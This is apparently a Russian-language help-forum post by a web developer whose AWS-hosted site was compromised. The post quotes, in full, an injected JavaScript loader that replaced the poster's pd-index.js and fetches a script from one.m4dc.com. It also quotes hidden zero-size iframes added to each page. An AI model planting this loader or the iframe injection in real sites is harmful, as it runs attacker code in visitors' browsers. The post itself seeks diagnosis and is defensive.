Одно из моих веб-приложений, размещенных на AWS, при загрузке в Microsoft Edge запрашивает загрузку 14-байтового файла с именем «t» из «one.m4dc.com», который не является моим доменом.Поэтому я начал проверять свои сценарии и страницы.Затем я заметил очень странное поведение.Содержимое одного из моих сценариев с именем pd-index.js было заменено содержимым, приведенным ниже.
try {
var esdmd51 = '1f4c5553ab20a8809f7f1724448c2f6e';
var d = document;
var esdfd5_uri = 'http://www.plantondesk.com/js/pd-index.js?m4dc56=176712';
if(0 != e6f744) {
var e6f744 = 0;
esdfd5 =! 0
}
else esdfd5 =! 1;
function ldS(e,t) {
var a = d.createElement("script");
a.type = "text/javascript",
a.readyState
?a.onreadystatechange = function() {
"loaded"!=a.readyState && "complete" != a.readyState || (a.onreadystatechange=null,t())
}
:a.onload = function() {
t()
},
a.src = e,
d.getElementsByTagName("head")[0].appendChild(a)
}
try {
vA = d.currentScript.async,
vD = d.currentScript.defer
}
catch(e) {
vA =! 0
}
vA || vD
?ldS(esdfd5_uri, function(){})
:(
d.write('<script id="esdfd576712" type="text/javascript" src="'+esdfd5_uri+'" ><\/script>'),
d.getElementById("esdfd576712") || ldS(sdfd5_uri, function(){})
),
esdfd5 && ldS("http://one.m4dc.com/j/si.js", function(){})
}
catch(e) {}
Весь этот код был написан в одну строку.Я структурировал его, чтобы понять.
Другая странная вещь заключается в том, что к содержанию тела каждой страницы добавляются два элемента div, приведенные ниже.
<div>
<iframe width="0px" height="0px" class="iifr" id="chk_frame" src="http://one.m4dc.com/i/si.html" frameborder="0" scrolling="no" allowtransparency="true"></iframe>
</div>
<div>
<iframe width="0px" height="0px" class="iifr" id="hdr_ifr" src="http://one.m4dc.com/t/?r=0.7112356815203629" frameborder="0" scrolling="no" allowtransparency="true"></iframe>
</div>
Запрос на загрузку файла происходит только в Microsoft Edge.Firefox и Chrome этого не делали.Но в любом случае мой сценарий и страницы изменены.Я не очень понимаю, что происходит.Похоже, какой-то взломать.Нет проблем, когда приложение запущено на локальном хосте.Любая помощь приветствуется.